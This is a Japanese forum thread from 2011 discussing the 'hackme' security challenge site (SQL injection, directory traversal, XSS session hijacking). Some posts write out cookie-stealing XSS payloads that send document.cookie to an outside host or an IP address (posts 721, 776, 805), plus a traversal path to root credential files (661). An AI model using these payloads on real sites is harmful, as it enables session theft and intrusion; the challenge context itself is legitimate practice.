646名無しさん@お腹いっぱい。:2011/02/25(金) 01:19:40.61
>>640
一字一句ってほど酷くはないよ。
よくある攻撃例をやれば通るかと。
647名無しさん@お腹いっぱい。:2011/02/25(金) 01:19:42.29
たぶん多くの人が試してるスクリプトは弾くようなコーディングをしてる奴が
スクリプトの埋め込みを許すようなことなんてそもそもあり得ないだろ
ググるだけで簡単にできるようなのはらめぇ って意図なんだろうか
648名無しさん@お腹いっぱい。:2011/02/25(金) 01:19:46.75
セキュ板に居て、こんなスレ見てるのにLv1解けないのはどうしょうもないよなw
649名無しさん@お腹いっぱい。:2011/02/25(金) 01:20:26.38
>>645
これは大人だからとい問題ではないだろう
ソースコードというのはhtmlファイルのこと?
650名無しさん@お腹いっぱい。:2011/02/25(金) 01:20:41.33
年齢は関係ないだろ、なにもしないのはバカだとはおもうが
651名無しさん@お腹いっぱい。:2011/02/25(金) 01:21:25.71
そういやアノサイトまだあるのかな?
クリックやらソースやらTABやら反転やら駆使してどんどんページを進んでいく凄く古くにあったサイト
652名無しさん@お腹いっぱい。:2011/02/25(金) 01:21:29.59
やっぱみんなLv4で詰まってんのな
スクリプト書いても弾かれるだけだしなぁ・・
653名無しさん@お腹いっぱい。:2011/02/25(金) 01:21:44.28
一字一句は微妙に違う気がするけどまぁ酷いのは確か
654とある、中学生:2011/02/25(金) 01:22:12.11
1LVの答え Yahooの知恵袋で晒されてたよな。
今は使えるか知らんけど
655名無しさん@お腹いっぱい。:2011/02/25(金) 01:22:14.80
>>645
どんだけ中学生アピールしたいんだよwww
言っとくけどこれらの問題は超ポピュラーだからな?解けない方がおかしい
その頃は俺もexeアンパックして解析とかしてたな
656名無しさん@お腹いっぱい。:2011/02/25(金) 01:22:30.55
闇プログラマの中学生がいると聞いて
657名無しさん@お腹いっぱい。:2011/02/25(金) 01:22:57.99
>>650
そう思うなら試してみろよ・・・
やりもしないでごちゃごちゃと
658名無しさん@お腹いっぱい。:2011/02/25(金) 01:23:04.50
あ、なんとなくわかったかも
659名無しさん@お腹いっぱい。:2011/02/25(金) 01:23:18.47
仮に自鯖があるとおもって書いてみろ
660とある、中学生:2011/02/25(金) 01:24:18.77
>>655
よっぽど複雑じゃない限りUnpackとか簡単だろw
つか、何歳だよw
661名無しさん@お腹いっぱい。:2011/02/25(金) 01:24:24.61
../../etc/security/passwd/tcb/auth/files/r/root
これくらいにしとけばきっとLv3の価値がもっとですね
662名無しさん@お腹いっぱい。:2011/02/25(金) 01:24:30.44
ソース見るのは2000年ちょいくらいの時期には既にあったからなぁ
663名無しさん@お腹いっぱい。:2011/02/25(金) 01:24:41.89
年齢自慢したいならRubyのコミッタになるぐらいしないと
こんなのは所詮ゲームの域を出ないよ
664名無しさん@お腹いっぱい。:2011/02/25(金) 01:25:53.48
このスレにいるやつら口は悪かいも知れないがイイヤツだな
アクセスしていていい感じだ
665名無しさん@お腹いっぱい。:2011/02/25(金) 01:26:09.35
>>663
その話題でるとおもったよw
666名無しさん@お腹いっぱい。:2011/02/25(金) 01:27:03.19
とりあえずハム速から来た奴は死んでくれよ
667名無しさん@お腹いっぱい。:2011/02/25(金) 01:27:20.55
年は自慢したくねーーーー
そろそろ介護保険...
668名無しさん@お腹いっぱい。:2011/02/25(金) 01:27:34.44
>>648
悪いが、どうしようもないと思うwww
669名無しさん@お腹いっぱい。:2011/02/25(金) 01:28:46.97
>>660

お前には馴染みが薄いかもしれんがデバッグした事あるか?x86のアセンブリわかるか?今は本当にハックするのに便利な環境だからな
670名無しさん@お腹いっぱい。:2011/02/25(金) 01:28:59.86
>>666
すまんハム速でHackmeのこと知ったわ。Lv4クリアしてるから勘弁してくれ。
671名無しさん@お腹いっぱい。:2011/02/25(金) 01:29:12.63
あっ、Lv4解けた
技術的というより、作者の考えに近づけるのに時間がかかったよ
672名無しさん@お腹いっぱい。:2011/02/25(金) 01:29:15.69
>>647
ググるだけで簡単に出来てしまったんだが。

ある程度の基礎知識(よくある攻撃方法)を広く浅く知っていれば
あとはググって出てきたサンプル通りやれば出来ると思う。
673名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:10.04
でも,LV1はある意味ノーヒントだから難しく考えて詰まる奴は多いと思う
Webアプリケーションセキュリティに詳しくない奴ほど早そう
674名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:13.01
hirarin0110さん乙
675名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:45.17
>>659
これを信じて突き進めばLv4はクリアできる。
676名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:56.89
>>669
x86のアセンブリわかって何が嬉しい、じいさん? はぁ
677名無しさん@お腹いっぱい。:2011/02/25(金) 01:32:09.16
なんか急に伸びだしてるな
何で?
678名無しさん@お腹いっぱい。:2011/02/25(金) 01:32:16.64
いいからはやくLv5解けよ
679とある、中学生:2011/02/25(金) 01:32:53.72
>>669
もちろんあるが?
x86アセンブリも大体わかる。
本当に今のご時勢はクラッキングしやすくなったよねぇ
680名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:01.36
>>673
そういう意味で言うと、Lv2もノーヒントだと思うけど
攻撃手法が有名だからLv2なんかな。
681名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:09.65
Lv4クリア済みの奴で協力してLv5攻略すべき
682名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:19.77
>>675
そういう自演はいらないです
683名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:48.79
>>675
嘘を付くのはよくないぞ
684名無しさん@お腹いっぱい。:2011/02/25(金) 01:35:16.43
中学生君よりスキル低いと思うけど、
あんまり中学生って事をアピールしない方が良いよ。
なんでって、年取ってから思い出すと恥ずかしかったりする。
まあそれだけだな。
685名無しさん@お腹いっぱい。:2011/02/25(金) 01:35:16.30
         ,. -‐'''''""¨¨¨ヽ
         (.___,,,... -ァァフ|          あ…ありのまま 今 起こった事を話すぜ!
          |i i|    }! }} //|
         |l、{   j} /,,ィ//|       『アクセスログを見ようとワクテカしてたら
        i|:!ヾ、_ノ/ u {:}//ヘ        ブラウザが動き出したた』
        |リ u' }  ,ノ _,!V,ハ |
       /´fト、_{ル{,ィ'eラ , タ人        な… 何を言ってるのか わからねーと思うが
     /'   ヾ|宀| {´,)⌒`/ |<ヽトiゝ        おれも何をされたのかわからなかった
    ,゙  / )ヽ iLレ  u' | | ヾlトハ〉
     |/_/  ハ !ニ⊇ '/:}  V:::::ヽ        頭がどうにかなりそうだった…
    // 二二二7'T'' /u' __ /:::::::/`ヽ
   /'´r -―一ァ‐゙T´ '"´ /::::/-‐  \    sessionidとかCSRFだとか
   / //   广¨´  /'   /:::::/´ ̄`ヽ ⌒ヽ    そんなチャチなもんじゃあ 断じてねえ
  ノ ' /  ノ:::::`ー-、___/::::://       ヽ  }
_/`丶 /:::::::::::::::::::::::::: ̄`ー-{:::...       イ  もっと恐ろしいものの片鱗を味わったぜ…
686名無しさん@お腹いっぱい。:2011/02/25(金) 01:35:19.19
>>672
LV4そんなことなくない?よくある例は通らない印象
687名無しさん@お腹いっぱい。:2011/02/25(金) 01:37:18.70
よくある例は通らなかったけど自分がいつも使う方法に変えたら通った
688名無しさん@お腹いっぱい。:2011/02/25(金) 01:37:36.15
lv4は自分がしたいことを至極簡潔に書けば問題ないけど
689名無しさん@お腹いっぱい。:2011/02/25(金) 01:37:39.01
>>682
いやいや、自演じゃないしww マジで信じてみなって。
そしたら >602 の意味が分かるよ。
690名無しさん@お腹いっぱい。:2011/02/25(金) 01:38:46.89
先生!
ずばりLV4はdocument.cookieの文字は含めますか!?
691名無しさん@お腹いっぱい。:2011/02/25(金) 01:39:23.35
>>686
自分流でやってみたら全然通らなくて、ググってコピペしたら通ったんだ。
正直、なんじゃそりゃーと思ったが、まあしょうがない。
692名無しさん@お腹いっぱい。:2011/02/25(金) 01:39:42.31
ところでランキングの名前表示順てどうなってるんだろうなこれ
明らかにクリア日時じゃないけどアルファベットでもないし
かといってランダムでもないし
アカウントID順だろうか
693名無しさん@お腹いっぱい。:2011/02/25(金) 01:39:50.23
リアル厨二病が居てわろた。
いつか大人になってわかると思うから何も言うまい。
694名無しさん@お腹いっぱい。:2011/02/25(金) 01:40:25.05
>>690
いい線行っているとだけ答えておこう。
695名無しさん@お腹いっぱい。:2011/02/25(金) 01:41:14.03
Don't think、feeeeeeeeeeeeeeeeeel!
696名無しさん@お腹いっぱい。:2011/02/25(金) 01:41:26.65
>>692
確かに、変な並び順だよなww
697名無しさん@お腹いっぱい。:2011/02/25(金) 01:41:35.19
ふぅ・・・
698名無しさん@お腹いっぱい。:2011/02/25(金) 01:42:07.42
IDに通し番号でも振ってあるんでしょ
699名無しさん@お腹いっぱい。:2011/02/25(金) 01:42:36.29
アカウント作成順(id順)だろ
700名無しさん@お腹いっぱい。:2011/02/25(金) 01:43:02.04
>>693
貴方も私の仲間ですか?
701名無しさん@お腹いっぱい。:2011/02/25(金) 01:43:16.77
hackmeなんてもの夜中にやるもんじゃなくて
昼間にやるもんだぜ、それぐらいの余裕が無いとな
702名無しさん@お腹いっぱい。:2011/02/25(金) 01:45:23.52
fuck me
703名無しさん@お腹いっぱい。:2011/02/25(金) 01:45:42.32
>>606 使えたんだけど、Lv5意味不明すぎる。
704名無しさん@お腹いっぱい。:2011/02/25(金) 01:59:08.32
Lv4 ってブラウザ依存してたりする?
Safari でやってんだけど、どうもスクリプトが実行されないんだよな。
705名無しさん@お腹いっぱい。:2011/02/25(金) 02:01:10.89
lv5やってみたが所見穴なしだった。
俺は新世界のログインページをひと目みれて満足した。
あとはお前達に託した。
706名無しさん@お腹いっぱい。:2011/02/25(金) 02:08:50.65
>>704
たぶん攻撃手法自体について何か勘違いをしている
707名無しさん@お腹いっぱい。:2011/02/25(金) 02:11:21.91
>>704
これが実際の脆弱性じゃなくて、脆弱性をエミュレートしたものだって判ってるか?
不正解な場合は命令は実行されない

Lv2のSQLも実際にSQL発行していないのはエラーメッセージから明らか
708名無しさん@お腹いっぱい。:2011/02/25(金) 02:11:46.06
あーもうやめた
lv4は10種以上、別鯖いらずの成功するパターン試したのに駄目とかやってらんね
こんなあほらしいセキュリティの為のパース処理とかねぇよ
709名無しさん@お腹いっぱい。:2011/02/25(金) 02:12:04.67
>>704
攻撃はいくつかのステップに分かれるが、ステップ1はブラウザ依存ないはず。
ステップ2以降は、俺は(アドオン目的で)Firefoxでやった。
710名無しさん@お腹いっぱい。:2011/02/25(金) 02:13:19.04
鯖は「いるけどいらない」
711名無しさん@お腹いっぱい。:2011/02/25(金) 02:13:39.15
>>708
逆に考えるんだ。
別鯖いらずの方法で散々試してもダメという事は・・・。
712名無しさん@お腹いっぱい。:2011/02/25(金) 02:17:12.10
別鯖に送る方法何種かやったけど
別鯖の方しか見てなかったがもしかして見逃してるのか・・
713名無しさん@お腹いっぱい。:2011/02/25(金) 02:17:42.26
いつもの惑わし
714名無しさん@お腹いっぱい。:2011/02/25(金) 02:17:47.11
つーか、こんだけヒント出てんのに解けないとかどういう事。
XSSって言葉の意味すら知らんのかね。
715名無しさん@お腹いっぱい。:2011/02/25(金) 02:18:52.49
>>708
俺も同じ意見だ。なんかアホらしくなってきた。
「スクリプトが実行可能なようです」で他のalert通らないとか
なんかやらされてる感ぷんぷんで萎える。
まあ、それでも色々試してみたんですけどね。
作者の意図を理解しなきゃ次に進めないとかパズルゲーム以下で面白くないわ
716名無しさん@お腹いっぱい。:2011/02/25(金) 02:19:13.74
>>710
これは良いヒントwww
717名無しさん@お腹いっぱい。:2011/02/25(金) 02:20:38.94
>>707
これがヒントだろ
718名無しさん@お腹いっぱい。:2011/02/25(金) 02:21:06.12
example.comでいいとかそういうオチじゃねえよな?
719名無しさん@お腹いっぱい。:2011/02/25(金) 02:21:38.78
>>715
そう思うのは時期尚早だぞ。
Lv2 は確かにパズルゲー的だったけど、Lv4 に関してはアプリケーションが何の脆弱性を
抱えているか分かれば、後は教科書通りのやり方でクリアできる。
720名無しさん@お腹いっぱい。:2011/02/25(金) 02:21:59.95
こういうのはセキュ板に居る奴だけでひっそりやるのが楽しいのに
ブログとかから無知なカスが沸いてくるのがマジうぜぇわ
721名無しさん@お腹いっぱい。:2011/02/25(金) 02:26:39.76
教科書通りにやるなら、UAに
<script>document.location="htpp://xxx.xxx/?cookie="+document.cookie</script>
を書いて終了なはず。
722名無しさん@お腹いっぱい。:2011/02/25(金) 02:27:05.13
教科書?どこが教科書通りなんだよ
脆弱性はxss
スクリプトが通ると言う前提で行われてるテストだろ
なのに1種しか通らないとかアホらしくて物がいえん
googleの懸賞のほうがまだマシだわ
723名無しさん@お腹いっぱい。:2011/02/25(金) 02:29:27.92
Lv5の手がかり掴めた人いる?
724名無しさん@お腹いっぱい。:2011/02/25(金) 02:30:27.82
>>721
そう思ってるうちは解けない
まあ理不尽な気もするけど
725名無しさん@お腹いっぱい。:2011/02/25(金) 02:30:45.58
正解したらどこに表示が出るのかだけでも知りたい
理論上は仕込んでからしばらく時間を置かないと見えないはずだけど
即反映されてログイン直後の画面に出てくるの?
726名無しさん@お腹いっぱい。:2011/02/25(金) 02:31:27.95
>>721
合ってるよ。あとは成りすましをすれば良い。
727名無しさん@お腹いっぱい。:2011/02/25(金) 02:32:00.96
>>724
具体的にどう理不尽なのか教えて
通常じゃありえねーだろっていうことが起こるの?
728名無しさん@お腹いっぱい。:2011/02/25(金) 02:33:42.25
>>725
遷移後の画面(履歴が5件表示される画面)にすぐ反映される。
729名無しさん@お腹いっぱい。:2011/02/25(金) 02:34:53.79
730名無しさん@お腹いっぱい。:2011/02/25(金) 02:35:22.21
>>728
ありがとう
もうちょい他の方法探してみる
731名無しさん@お腹いっぱい。:2011/02/25(金) 02:35:47.51
なんかもうLV4もほぼネタバレ祭り状態だな
こんなんじゃ週末にはLV4クリア200人超えとかするんじゃないか
732名無しさん@お腹いっぱい。:2011/02/25(金) 02:36:27.61
もーちょいLv4のヒントくれ、頼むわ
理不尽さを少しは補完してくれ
733名無しさん@お腹いっぱい。:2011/02/25(金) 02:36:43.73
>>730
頑張れ。正解したら「えぇぇぇww」ってなると思う。
734名無しさん@お腹いっぱい。:2011/02/25(金) 02:36:46.94
コード貼っちゃう人とかちょっと大人気ないんじゃないかなー
735名無しさん@お腹いっぱい。:2011/02/25(金) 02:37:36.78
課程には理不尽さはないはず。結果の出方が面白いだけで
736名無しさん@お腹いっぱい。:2011/02/25(金) 02:37:45.36
>>732
正直、ヒントはこのスレで出尽くしているんで、これ以上は無理だわ。
737名無しさん@お腹いっぱい。:2011/02/25(金) 02:37:56.70
なんかlv4の正解見たらキレるんじゃないかって気がしてきたわ・・・
738名無しさん@お腹いっぱい。:2011/02/25(金) 02:39:34.19
>>721
なにこれネタバレ?
739名無しさん@お腹いっぱい。:2011/02/25(金) 02:39:46.32
>>731
俺的には1000人越えくらいして、総力戦でレベル5に挑みたいわ。
740名無しさん@お腹いっぱい。:2011/02/25(金) 02:41:09.47
>>737
そんな事はないと思う。
一番萎えたのはLv2。Lv4は、まあまあ順当だと思う。
741名無しさん@お腹いっぱい。:2011/02/25(金) 02:41:12.16
Lv4クリアochinkoより
Javascriptビジュアル・リファレンス改訂版P228に答えが載ってる
742名無しさん@お腹いっぱい。:2011/02/25(金) 02:41:31.90
やりかたは絶対あってるはずなんだよ。
だけど正解が見つからないだけなんだよ。
だから誰かもう答え教えてくれ。
743名無しさん@お腹いっぱい。:2011/02/25(金) 02:43:17.33
>>742
思い込み。
ぐだぐだネタバレに近いものを書くヒマがあったら試そう。
744名無しさん@お腹いっぱい。:2011/02/25(金) 02:44:30.89
はあ また具体的なネタバレかよ
直接書かないだけマシだけどわざわざ名前書くとことか最高にダサい
745名無しさん@お腹いっぱい。:2011/02/25(金) 02:44:55.03
>>742
分かるwww 多分、もう少しだぞ。がんばれ。
746名無しさん@お腹いっぱい。:2011/02/25(金) 02:47:45.63
>>744
どうせ本持ってなきゃ無理だし本には答えの1/3くらいしか実際には書いてない
747730:2011/02/25(金) 02:49:30.05
えぇぇぇww
748名無しさん@お腹いっぱい。:2011/02/25(金) 02:49:52.52
解けた…嘘だろ…
749名無しさん@お腹いっぱい。:2011/02/25(金) 02:51:00.89
なんで完全一致しかダメなんだよ…嘘だろ…
750名無しさん@お腹いっぱい。:2011/02/25(金) 02:51:20.75
おめww
感想を書いてくれ。
それが俺達のヒントになる。
751名無しさん@お腹いっぱい。:2011/02/25(金) 02:51:44.79
完全一致だと・・・何そのクソゲー
752名無しさん@お腹いっぱい。:2011/02/25(金) 02:52:22.37
お前は次に「>>602が全てだった」という
753名無しさん@お腹いっぱい。:2011/02/25(金) 02:52:26.85
Hackmeはゲームとしては面白いけど,公式アカウントとか何考えてるんだろう
どう考えても今のままじゃビジネスモデルとして成立しないと思うんだけど
ユーザが増えなきゃ宣伝にはならないし,ユーザが増えたらネタバレだって増えるんだし
754名無しさん@お腹いっぱい。:2011/02/25(金) 02:52:47.62
>>748
同時かww
755名無しさん@お腹いっぱい。:2011/02/25(金) 02:53:22.03
え、完全一致じゃないとだめなの?
ためしてくる!
756名無しさん@お腹いっぱい。:2011/02/25(金) 02:54:11.55
>>755
完全一致と聞いて逆にヤル気が起きてるお前を尊敬する。
757名無しさん@お腹いっぱい。:2011/02/25(金) 02:55:24.79
完全一致…
まじかよ…
locationぶっ飛ばし系でいいのか?
つかjqueryじゃないだろうな
てかajaxで飛ばしてるんだからニョロンってなれよ…
758名無しさん@お腹いっぱい。:2011/02/25(金) 02:55:51.27
俺の2日間嘘だろ…
759名無しさん@お腹いっぱい。:2011/02/25(金) 02:57:48.19
>>756
いや、じゃなくて。
全然完全一致じゃないじゃん。。。手法は今のとこ1通りしか見つけてないけど、書き方はいろいろできる。
760名無しさん@お腹いっぱい。:2011/02/25(金) 02:57:50.70
     *      *
  *  うそです   +  
     n ∧_∧ n
 + (ヨ(* ´∀`)E)
      Y     Y    *
761名無しさん@お腹いっぱい。:2011/02/25(金) 02:58:34.15
>>747
だから言っただろwwww
762名無しさん@お腹いっぱい。:2011/02/25(金) 02:58:49.80
location
src
href
これらのうちどれかを使うのかだけ教えてくれ
763名無しさん@お腹いっぱい。:2011/02/25(金) 02:59:18.96
>>762
このスレをみればわかる!
764名無しさん@お腹いっぱい。:2011/02/25(金) 02:59:39.48
>>602が全てだった、…っは!?
765名無しさん@お腹いっぱい。:2011/02/25(金) 03:00:25.03
挙動が同じであっても特定のワードが揃わないとリジェクトされるみたい。
嘘だろ…
766名無しさん@お腹いっぱい。:2011/02/25(金) 03:01:29.37
eeeeee
767名無しさん@お腹いっぱい。:2011/02/25(金) 03:02:06.81
まじでかw
768名無しさん@お腹いっぱい。:2011/02/25(金) 03:02:20.26
>>762
その問いに対する答えは既に出ている。
769名無しさん@お腹いっぱい。:2011/02/25(金) 03:03:34.37
>>765
それはLv2で体験済みだろwww
だから、出来るだけ「良くある書き方」から試していくんだ。
770名無しさん@お腹いっぱい。:2011/02/25(金) 03:03:48.01
うわこれはひどいwww
確かに>>602がすべてだったwww
771名無しさん@お腹いっぱい。:2011/02/25(金) 03:04:14.22
常識を問われているわけですねわかります
772名無しさん@お腹いっぱい。:2011/02/25(金) 03:04:23.29
うげぇ
ふざけんな…
ブラウザ依存考慮してのアレなんだろうが、別にアレでもいいだろうが…

cookieからnameを拾って内部でそのまま表示させてると仮定
別鯖経由させないならこの手法でロギング出来るので…

document.cookie='name='+document.cookie;location.reload();

とか色々やってた俺は何なんだよ!

まじうぜぇwwwwwwwwwwww

他にもeval,xhr,iframe,ajaxやら何やら色々ためしたぞ、糞がwwwwwwww
773名無しさん@お腹いっぱい。:2011/02/25(金) 03:04:56.68
答えとかヒント聞く奴は結局ヒントだけでここまできて,何も理解してないだろ
少なくともLV4まではちゃんと調べればなんとかなるぞ
問題は正解でもいいんじゃないかってのが通らない場合があるってことだけ
774名無しさん@お腹いっぱい。:2011/02/25(金) 03:05:58.96
>>773
>問題は正解でもいいんじゃないかってのが通らない場合があるってことだけ
それがクソなんだよ
775名無しさん@お腹いっぱい。:2011/02/25(金) 03:06:40.10
>>773
いや、lv4は酷い
まさに一字一句じゃねぇか
考えかがあってるけどテキスト違いますとかほんと苛つく

まぁもうクリアしたから別にいいけどな…
776名無しさん@お腹いっぱい。:2011/02/25(金) 03:06:55.29
javascript:document.location="http://66.249.89.99/cookie.php?c="+document.cookie
777名無しさん@お腹いっぱい。:2011/02/25(金) 03:07:19.10
もうむりwww
778名無しさん@お腹いっぱい。:2011/02/25(金) 03:08:03.46
>>772
あんた、、相当色々な事をやってたんだな。
779名無しさん@お腹いっぱい。:2011/02/25(金) 03:08:22.94
>>772
ご苦労さんwww
でも document.cookie='name='+document.cookie; は通らないんじゃない?
780名無しさん@お腹いっぱい。:2011/02/25(金) 03:09:20.93
ログインに飛ばすとか
飛んだらばれるから非同期で送るとか散々やったのにこの仕打ち
781名無しさん@お腹いっぱい。:2011/02/25(金) 03:10:04.54
Lv4そんなに酷いかな? 上のほうにも出てたけど、教科書的じゃない?
782名無しさん@お腹いっぱい。:2011/02/25(金) 03:11:22.10
そろそろLv4の話も出尽くしたし、次いこうぜ…
783名無しさん@お腹いっぱい。:2011/02/25(金) 03:11:36.74
なぜ>>776でいけないのか教えてください。
784名無しさん@お腹いっぱい。:2011/02/25(金) 03:12:05.04
あれですか?この程度のものじゃ破れないだろう?って先入観で、
もっと小難しいことやると通らないって事ですか?
785名無しさん@お腹いっぱい。:2011/02/25(金) 03:12:40.73
Lv4 40文字でいけたよ
786名無しさん@お腹いっぱい。:2011/02/25(金) 03:13:14.36
とりあえずコード張り付けるのはやめようよ

Lv5手がかり全然無いよな・・・
787名無しさん@お腹いっぱい。:2011/02/25(金) 03:13:55.64
>>779
ちょい前のへっぽこサービスだとログイン後に名前をcookieに保持させる事があるだろう
毎回dbに問い合わせてusername取ってくるちょいアレなシステムの負荷低減のためにさ
それを想定したのよ

まぁしかしこりゃまたほんとに基本だったわwww

んじゃlv5を覗いてみるか…
788名無しさん@お腹いっぱい。:2011/02/25(金) 03:14:57.32
>>783
ログイン後のページのソース(HTML)をエディタか何かで保存して
>>776 のソースを適当な場所に挿入してみたら分かるんじゃない?
789名無しさん@お腹いっぱい。:2011/02/25(金) 03:15:00.61
Lv5の答えはあなたのGoogleアカウントです
790名無しさん@お腹いっぱい。:2011/02/25(金) 03:16:06.03
Lv5が完璧に見えるんだが、なんかヒントないのか。
791785:2011/02/25(金) 03:16:54.89
>>774
本来正解となりえないものが正解になるわけだが、そこもやっぱりクソな点だよな
792名無しさん@お腹いっぱい。:2011/02/25(金) 03:17:11.07
あー、でもLv4の問題が理不尽だったおかげで色んな回り道は覚えたな・・
793名無しさん@お腹いっぱい。:2011/02/25(金) 03:19:53.12
Lv4のにょきっ!にビビったwww
794名無しさん@お腹いっぱい。:2011/02/25(金) 03:19:56.29
hackme まとめ。

Lv1:ある程度ネットに親しんでいる人なら誰でもクリア可能。
Lv2:SQLインジェクション
Lv3:ディレクトリトラバーサル
Lv4:セッションハイジャック(XSSで盗聴)
Lv5:不明
795名無しさん@お腹いっぱい。:2011/02/25(金) 03:20:08.91
hackmeは注目が増えて評判は下がる一方だなw
796名無しさん@お腹いっぱい。:2011/02/25(金) 03:21:06.49
ネットファイアすげーって全く思えないのがすげー
797名無しさん@お腹いっぱい。:2011/02/25(金) 03:21:09.23
>>793
にょきっ!は笑うよなw
798名無しさん@お腹いっぱい。:2011/02/25(金) 03:21:55.61
まとめ。(キリッ

お前馬鹿だろ
799名無しさん@お腹いっぱい。:2011/02/25(金) 03:22:26.30
Lv5って、一応ほんとのIDパスは用意してるけど、こういう構成にしてると破られないでしょ?
いろいろな情報を表示するのもいいけれど、気をつけないと危険な目にあいますよ、といいたいのかなぁ
800名無しさん@お腹いっぱい。:2011/02/25(金) 03:25:10.25
ランキングのhtml出力見たけど、
改行タグの位置がLv5(h1閉じ直後)とLv4(IDリストの次の行)で違うね。
ひょっとしたらLv5の位置には最初からIDリストの出力が想定されてないんじゃないかって気が
801名無しさん@お腹いっぱい。:2011/02/25(金) 03:25:22.66
問題としてる以上何らかの脆弱性がないとフェアじゃないんじゃないか
さすがにそれやったら評判うんこだろ
当たり抜きのくじみたいなもん
802名無しさん@お腹いっぱい。:2011/02/25(金) 03:27:36.05
だが中の人も解いてないんだぜやおいちゃん
803名無しさん@お腹いっぱい。:2011/02/25(金) 03:27:39.26
>>799
それなら総当りおkになるよな
804名無しさん@お腹いっぱい。:2011/02/25(金) 03:27:43.51
この手のサイトつくっておいて
「100万PV達成しました!ありがとうございます!」
だぜ?

PVがいかに指標として役に立たないかについても言及するつもりがあるならいいけど、ねぇw
805名無しさん@お腹いっぱい。:2011/02/25(金) 03:28:52.54
<script>document.location="http://hackme.netfire.jp/Lv4/login ;sessionid="+document.cookie.match(sessionid=[^;]+/)</script>
とかじゃないの?
806名無しさん@お腹いっぱい。:2011/02/25(金) 03:30:08.35
これでLv5の問題がガチな脆弱性発見してくださいとかなら公式のページ破壊するしかないな
807名無しさん@お腹いっぱい。:2011/02/25(金) 03:30:13.95
試して変化があれば正解、そうじゃなければ不正解。
なんでそんなのも判断できないの?
808名無しさん@お腹いっぱい。:2011/02/25(金) 03:31:29.76
lv5は高木さん降臨しないと無理っぽい
というか以外と国内のセキュリティに詳しい人ってそれ程でも無いんだなぁとこのテストからわかった
809名無しさん@お腹いっぱい。:2011/02/25(金) 03:31:40.42
>>796
なんか・・・、やっつけ感がね。
810名無しさん@お腹いっぱい。:2011/02/25(金) 03:32:48.09
はまちちゃんまだか
811名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:17.09
>>802
確かにな。中の人がLv5クリアしてないってのは大きなヒントかもな。
812名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:25.01
>>807
アドバイスがほしいから。
813名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:33.43
>>808
シビアすぎなだけです
814名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:43.09
>>808
さすがに挑戦してないだけだろう
じゃなきゃ面目にかけて2chでもなんでも見てLv4に名前があるはず
815名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:47.74
にょき!を入手したのはいいがこれ本物と違わね?なにごとや
816名無しさん@お腹いっぱい。:2011/02/25(金) 03:35:19.68
つか、ここにコード書くんじゃねぇーよ
817名無しさん@お腹いっぱい。:2011/02/25(金) 03:35:51.34
コード書くなとかネタバレすんなって言ってる奴は社員か?
818名無しさん@お腹いっぱい。:2011/02/25(金) 03:36:28.32
はまちちゃんにLv5やって欲しいわー
819名無しさん@お腹いっぱい。:2011/02/25(金) 03:38:31.76
>>812
じゃあ真面目に答える。
それじゃない。
820名無しさん@お腹いっぱい。:2011/02/25(金) 03:41:19.05
社員じゃないけどコード書いてネタばれはないわ
そしてすまん
ここに載ってる不正解コードはIE6じゃ動かないんだな
821名無しさん@お腹いっぱい。:2011/02/25(金) 03:42:18.62
Lv5はこれなんなの?
難しすぎる
822名無しさん@お腹いっぱい。:2011/02/25(金) 03:45:30.80
Lv5はソーシャル・エンジニアリング
netfire社のゴミ袋に正解が書いてある
823名無しさん@お腹いっぱい。:2011/02/25(金) 03:46:39.52
>>820
何でみんなそう書いてんだろう、と不思議に思ってたんだけど、いつのころからかそう書けるようになってたんだね。。。しらなかった。
824名無しさん@お腹いっぱい。:2011/02/25(金) 03:47:59.95
lv5は管理者権限奪取
825名無しさん@お腹いっぱい。:2011/02/25(金) 03:58:59.71
foobar限定で狙ってるわけではないのでIE6にそこまで拘る必要もない
っていうのもある。
826名無しさん@お腹いっぱい。:2011/02/25(金) 04:03:09.30
lv5、エラー出たかも…
でも、、これ再現の仕方がよくわからん…
827名無しさん@お腹いっぱい。:2011/02/25(金) 04:06:03.50
TwitterでLv2の答え書いてるアホが多いな
828名無しさん@お腹いっぱい。:2011/02/25(金) 04:08:19.25
Lv4やっとクリアした…
つーか、user agent switcher って UA の変更したあとにツールからまた選択しなおさないといけないのな…
こんなくだらないことで数時間無駄にしたわ
829名無しさん@お腹いっぱい。:2011/02/25(金) 04:10:07.16
>>828
付属テストもしないなんて。。。
830名無しさん@お腹いっぱい。:2011/02/25(金) 04:13:55.16
Lv4突破。にょき!に気づかず恐らく何回か遠回りしていた
831名無しさん@お腹いっぱい。:2011/02/25(金) 04:19:24.88
にょきったものをどう使うの?
832名無しさん@お腹いっぱい。:2011/02/25(金) 04:19:43.77
さすがにこれは辛いな。
833名無しさん@お腹いっぱい。:2011/02/25(金) 04:21:34.29
Lv4ってfoobarがログインまだしてますよってのを利用するのかな。
話聞いてるとクッキー内のsessionidで判別してるっぽいけどfoobarのsessionidなんてわからないよね。
そこをどうにかするのがみそなのかな
834名無しさん@お腹いっぱい。:2011/02/25(金) 04:26:16.29
Lv5のエラーメッセージ見えた。赤字で出る。
835名無しさん@お腹いっぱい。:2011/02/25(金) 04:30:09.23
にょきって具体的にどんな表示?
836名無しさん@お腹いっぱい。:2011/02/25(金) 04:32:30.79
まぁ見ればすぐわかるようににょき!
でもそれをどうするかがわからない sessionidとは違うみたいだ
837名無しさん@お腹いっぱい。:2011/02/25(金) 04:49:31.24
>>835
JavaScriptをONにした状態でログイン後の表示を3秒見る
変化がなければ失敗
視力0.5でも見落とさないくらいでかい

>>831
そこはまったく理不尽さがない
ぐぐれとしか

>>833
スレが落ちる前にもう一度読み直すべき
どういう技術を使うかはわかる
解らなかったら一から勉強しなおすレベル
838名無しさん@お腹いっぱい。:2011/02/25(金) 04:52:40.49
Lv5、まったくわからん。「The input field '' was not expected.」とか「文字を与えてください」でどうこうではないんだろうなあ・・
839名無しさん@お腹いっぱい。:2011/02/25(金) 04:54:06.50
>>828
これがすべてだった。まじ死にたい。
840名無しさん@お腹いっぱい。:2011/02/25(金) 04:56:14.45
